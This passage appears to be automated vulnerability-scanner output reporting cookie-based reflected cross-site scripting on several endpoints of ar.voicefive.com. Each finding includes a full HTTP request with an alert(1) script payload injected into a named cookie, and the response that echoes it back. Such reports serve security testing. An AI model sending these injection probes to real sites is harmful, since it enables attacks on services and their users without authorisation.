This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /b/node_rcAll.pli?func=COMSCORE.BMX.Buddy.run&1308010663788 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/mtv.mtvi/survey;sec0=music;sec1=_mn;node=survey;sz=1x2;ord=733653447125107100?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&96c60<script>alert(1)</script>4bda17080c7; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; BMX_BR=pid=p104567837&prad=63567820&arc=42361216&exp=1308010528; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; UID=4a757a7-24.143.206.42-1305663172; BMX_3PC=1

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:17:45 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_G=0; expires=Thu 18-Sep-2008 00:17:45 GMT; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 1557

COMSCORE.BMX.Buddy.run({ "ar_p97464717": 'exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&', "ar_p101866669": 'exp=1&initExp=Sat May 21 12:32:54 2011&
...[SNIP]...
9:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&', "ar_p81479006": 'exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&96c60<script>alert(1)</script>4bda17080c7' });
3.57. http://ar.voicefive.com/b/node_rcAll.pli [ar_p82806590 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/node_rcAll.pli

Issue detail

The value of the ar_p82806590 cookie is copied into the HTML document as plain text between tags. The payload 69309<script>alert(1)</script>3ac55d912d3 was submitted in the ar_p82806590 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /b/node_rcAll.pli?func=COMSCORE.BMX.Buddy.run&1308010663788 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/mtv.mtvi/survey;sec0=music;sec1=_mn;node=survey;sz=1x2;ord=733653447125107100?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&69309<script>alert(1)</script>3ac55d912d3; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; BMX_BR=pid=p104567837&prad=63567820&arc=42361216&exp=1308010528; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; UID=4a757a7-24.143.206.42-1305663172; BMX_3PC=1

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:17:45 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_G=0; expires=Thu 18-Sep-2008 00:17:45 GMT; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 1557

COMSCORE.BMX.Buddy.run({ "ar_p97464717": 'exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&', "ar_p101866669": 'exp=1&initExp=Sat May 21 12:32:54 2011&
...[SNIP]...
May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&', "ar_p82806590": 'exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&69309<script>alert(1)</script>3ac55d912d3', "BMX_G": '0', "ar_p84552060": 'exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&', "ar_p20101109": 'exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mo
...[SNIP]...
3.58. http://ar.voicefive.com/b/node_rcAll.pli [ar_p84552060 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/node_rcAll.pli

Issue detail

The value of the ar_p84552060 cookie is copied into the HTML document as plain text between tags. The payload 9bae7<script>alert(1)</script>d8f791fc7fb was submitted in the ar_p84552060 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /b/node_rcAll.pli?func=COMSCORE.BMX.Buddy.run&1308010663788 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/mtv.mtvi/survey;sec0=music;sec1=_mn;node=survey;sz=1x2;ord=733653447125107100?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&9bae7<script>alert(1)</script>d8f791fc7fb; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; BMX_BR=pid=p104567837&prad=63567820&arc=42361216&exp=1308010528; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; UID=4a757a7-24.143.206.42-1305663172; BMX_3PC=1

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:17:45 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_G=0; expires=Thu 18-Sep-2008 00:17:45 GMT; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 1557

COMSCORE.BMX.Buddy.run({ "ar_p97464717": 'exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&', "ar_p101866669": 'exp=1&initExp=Sat May 21 12:32:54 2011&
...[SNIP]...
2:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&', "BMX_G": '0', "ar_p84552060": 'exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&9bae7<script>alert(1)</script>d8f791fc7fb', "ar_p20101109": 'exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&', "ar_p56282763": 'exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2
...[SNIP]...
3.59. http://ar.voicefive.com/b/node_rcAll.pli [ar_p91143664 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/node_rcAll.pli

Issue detail

The value of the ar_p91143664 cookie is copied into the HTML document as plain text between tags. The payload 20f87<script>alert(1)</script>2527a3b6a73 was submitted in the ar_p91143664 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /b/node_rcAll.pli?func=COMSCORE.BMX.Buddy.run&1308010663788 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/mtv.mtvi/survey;sec0=music;sec1=_mn;node=survey;sz=1x2;ord=733653447125107100?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&20f87<script>alert(1)</script>2527a3b6a73; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; BMX_BR=pid=p104567837&prad=63567820&arc=42361216&exp=1308010528; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; UID=4a757a7-24.143.206.42-1305663172; BMX_3PC=1

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:17:44 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_G=0; expires=Thu 18-Sep-2008 00:17:44 GMT; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 1557

COMSCORE.BMX.Buddy.run({ "ar_p97464717": 'exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&', "ar_p101866669": 'exp=1&initExp=Sat May 21 12:32:54 2011&
...[SNIP]...
42330646&', "BMX_BR": 'pid=p104567837&prad=63567820&arc=42361216&exp=1308010528', "ar_p91143664": 'exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&20f87<script>alert(1)</script>2527a3b6a73', "ar_p81479006": 'exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&' });
3.60. http://ar.voicefive.com/b/node_rcAll.pli [ar_p97174789 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/node_rcAll.pli

Issue detail

The value of the ar_p97174789 cookie is copied into the HTML document as plain text between tags. The payload 5e81e<script>alert(1)</script>764a5040dac was submitted in the ar_p97174789 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /b/node_rcAll.pli?func=COMSCORE.BMX.Buddy.run&1308010663788 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/mtv.mtvi/survey;sec0=music;sec1=_mn;node=survey;sz=1x2;ord=733653447125107100?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&5e81e<script>alert(1)</script>764a5040dac; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; BMX_BR=pid=p104567837&prad=63567820&arc=42361216&exp=1308010528; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; UID=4a757a7-24.143.206.42-1305663172; BMX_3PC=1

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:17:45 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_G=0; expires=Thu 18-Sep-2008 00:17:45 GMT; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 1557

COMSCORE.BMX.Buddy.run({ "ar_p97464717": 'exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&', "ar_p101866669": 'exp=1&initExp=Sat May 21 12:32:54 2011&
...[SNIP]...
Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&', "ar_p97174789": 'exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&5e81e<script>alert(1)</script>764a5040dac', "ar_p82806590": 'exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&', "BMX_G": '0', "ar_p84552060": 'exp=1&initExp=Sat May 21 12:33:10 2011&recExp=
...[SNIP]...
3.61. http://ar.voicefive.com/b/node_rcAll.pli [ar_p97464717 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/node_rcAll.pli

Issue detail

The value of the ar_p97464717 cookie is copied into the HTML document as plain text between tags. The payload 35678<script>alert(1)</script>3fd8551a319 was submitted in the ar_p97464717 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /b/node_rcAll.pli?func=COMSCORE.BMX.Buddy.run&1308010663788 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/mtv.mtvi/survey;sec0=music;sec1=_mn;node=survey;sz=1x2;ord=733653447125107100?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&35678<script>alert(1)</script>3fd8551a319; BMX_BR=pid=p104567837&prad=63567820&arc=42361216&exp=1308010528; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; UID=4a757a7-24.143.206.42-1305663172; BMX_3PC=1

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:17:46 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_G=0; expires=Thu 18-Sep-2008 00:17:46 GMT; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 1557

COMSCORE.BMX.Buddy.run({ "ar_p97464717": 'exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&35678<script>alert(1)</script>3fd8551a319', "ar_p101866669": 'exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&', "ar_p104567837": 'exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14
...[SNIP]...
3.62. http://ar.voicefive.com/bmx3/node.pli [BMX_BR cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/node.pli

Issue detail

The value of the BMX_BR cookie is copied into the HTML document as plain text between tags. The payload 4fcdf<script>alert(1)</script>8ee39c256d0 was submitted in the BMX_BR cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/node.pli?pub=mtv HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/mtv.mtvi/survey;sec0=music;sec1=_mn;node=survey;sz=1x2;ord=733653447125107100?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; BMX_BR=pid=p104567837&prad=63567820&arc=42361216&exp=13080105284fcdf<script>alert(1)</script>8ee39c256d0; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; UID=4a757a7-24.143.206.42-1305663172

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:17:37 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 16068

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Buddy)!="undefined"){}else{if(typeof(COMSCORE)=="undefined"){var COMSCORE={};
}if(typeof(COMSCORE.BMX)=="undef
...[SNIP]...
X_3PC": '1', "ar_p101945457": 'exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&', "BMX_BR": 'pid=p104567837&prad=63567820&arc=42361216&exp=13080105284fcdf<script>alert(1)</script>8ee39c256d0', "ar_p91143664": 'exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&', "ar_p81479006": 'exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10
...[SNIP]...
3.63. http://ar.voicefive.com/bmx3/node.pli [UID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
